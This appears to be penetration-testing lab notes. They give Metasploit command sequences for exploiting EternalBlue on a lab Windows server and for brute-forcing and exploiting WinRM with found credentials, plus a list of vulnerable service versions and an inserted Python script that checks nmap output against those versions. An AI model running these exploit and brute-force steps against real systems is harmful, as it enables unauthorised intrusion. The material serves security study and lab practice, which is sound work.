Exploitation
An HFS (HTTP File Server) is a file and document sharing web server.
Rejetto HFS - free open source HTTP file server
EternalBlue takes advantage of a Windows SMBv1 protocol vulnerability
Patch was released in March 2017
🔬 Check the
Some useful MSF commands from my home lab (Kali VM + Win 2008_R2 Server)
    service postgresql start && msfconsole -q
    db_status
    setg RHOSTS 192.168.31.131
    setg RHOST 192.168.31.131
    workspace -a EternalBlue
    db_nmap -sS -sV -O 192.168.31.131
    search type:auxiliary EternalBlue
    use auxiliary/scanner/smb/smb_ms17_010
    options
    run
    search type:exploit EternalBlue
    use exploit/windows/smb/ms17_010_eternalblue
    options
    run
Identify WinRM users with MSF and exploit WinRM by obtaining access credentials.
Default WinRM HTTP port is 5985 and HTTPS 5986
Tomcat default TCP port is 8080
The Apache web server hosts HTML/PHP web apps instead
Apache Tomcat < v.8.5.23 is vulnerable to a JSP Upload Bypass / RCE
vsftpd v.2.3.4 is vulnerable to a command execution vulnerability
Samba is the Linux implementation of SMB.
Samba v.3.5.0 is vulnerable to an RCE vulnerability
libssh is a C library that implements the SSHv2 protocol
SSH default TCP port is 22
libssh v.0.6.0 - 0.8.0 is vulnerable to an authentication bypass vulnerability
SMTP default TCP port is 25; other TCP ports are 465 and 587
Haraka prior to v.2.8.9 is vulnerable to command injection
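The version ranges listed above can be checked against `nmap -sV` output during a patch audit. This is an added example, not part of the original notes: the sample scan output is constructed, and the banner patterns are assumptions about how nmap labels these services.

```python
import re

NUM = r"(\d+(?:\.\d+)+)"
# (product, banner regex, lowest affected or None, upper bound, bound inclusive?)
# Bounds are the ranges listed in these notes; banner regexes are assumptions.
RULES = [
    ("Apache Tomcat", rf"Apache Tomcat {NUM}", None, "8.5.23", False),
    ("vsftpd", rf"vsftpd {NUM}", "2.3.4", "2.3.4", True),
    ("Samba", rf"Samba(?: smbd)? {NUM}", "3.5.0", "3.5.0", True),
    ("libssh", rf"libssh {NUM}", "0.6.0", "0.8.0", True),
    ("Haraka", rf"Haraka(?: smtpd)? {NUM}", None, "2.8.9", False),
]
PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+(.*)$")

def ver(text):
    """'8.5.9' -> (8, 5, 9), so 8.5.9 sorts below 8.5.23 (string comparison would not)."""
    return tuple(int(part) for part in text.split("."))

def in_range(found, low, high, inclusive):
    """True when version string `found` lies inside the affected range."""
    if low is not None and ver(found) < ver(low):
        return False
    return ver(found) <= ver(high) if inclusive else ver(found) < ver(high)

def audit(nmap_output):
    """Return (port, product, version) for each open service inside a listed range."""
    findings = []
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.strip())
        banner = m.group(2) if m else ""
        for product, pattern, low, high, inclusive in RULES:
            hit = re.search(pattern, banner, re.IGNORECASE)
            # No version next to the product name means no verdict: check by hand.
            if hit and in_range(hit.group(1), low, high, inclusive):
                findings.append((int(m.group(1)), product, hit.group(1)))
    return findings

# Constructed sample in the shape of `nmap -sV` output (not from a real scan).
SAMPLE = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         libssh 0.8.3 (protocol 2.0)
25/tcp   open  smtp        Haraka smtpd 2.8.8
445/tcp  open  netbios-ssn Samba smbd 3.5.0
8009/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
8080/tcp open  http        Apache Tomcat 8.5.9
"""

if __name__ == "__main__":
    print(audit(SAMPLE))
```

The libssh 0.8.3 line falls outside the listed range and is not reported, and the Coyote banner carries no Tomcat version, so it is skipped rather than guessed at.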
    service postgresql start && msfconsole -q
    db_status
    setg RHOSTS 10.2.27.173
    setg RHOST 10.2.27.173
    workspace -a WinRM
    db_nmap -sS -sV -O -p- 10.2.27.173
    # Port 5985 is set up for WinRM
    search type:auxiliary winrm
    use auxiliary/scanner/winrm/winrm_auth_methods
    options
    run
    # Brute force WinRM login
    search winrm_login
    use auxiliary/scanner/winrm/winrm_login
    set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
    set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
    search winrm_cmd
    use auxiliary/scanner/winrm/winrm_cmd
    set USERNAME administrator
    set PASSWORD tinkerbell
    set CMD whoami
    run
    search winrm_script
    use exploit/windows/winrm/winrm_script_exec
    set USERNAME administrator
    set PASSWORD tinkerbell
    set FORCE_VBS true
    exploit
Apache Tomcat is a free open source Java servlet web server, built to host dynamic websites and web apps developed in Java.
vsftpd is a Unix FTP server.
Haraka is an open source high performance SMTP server developed in Node.js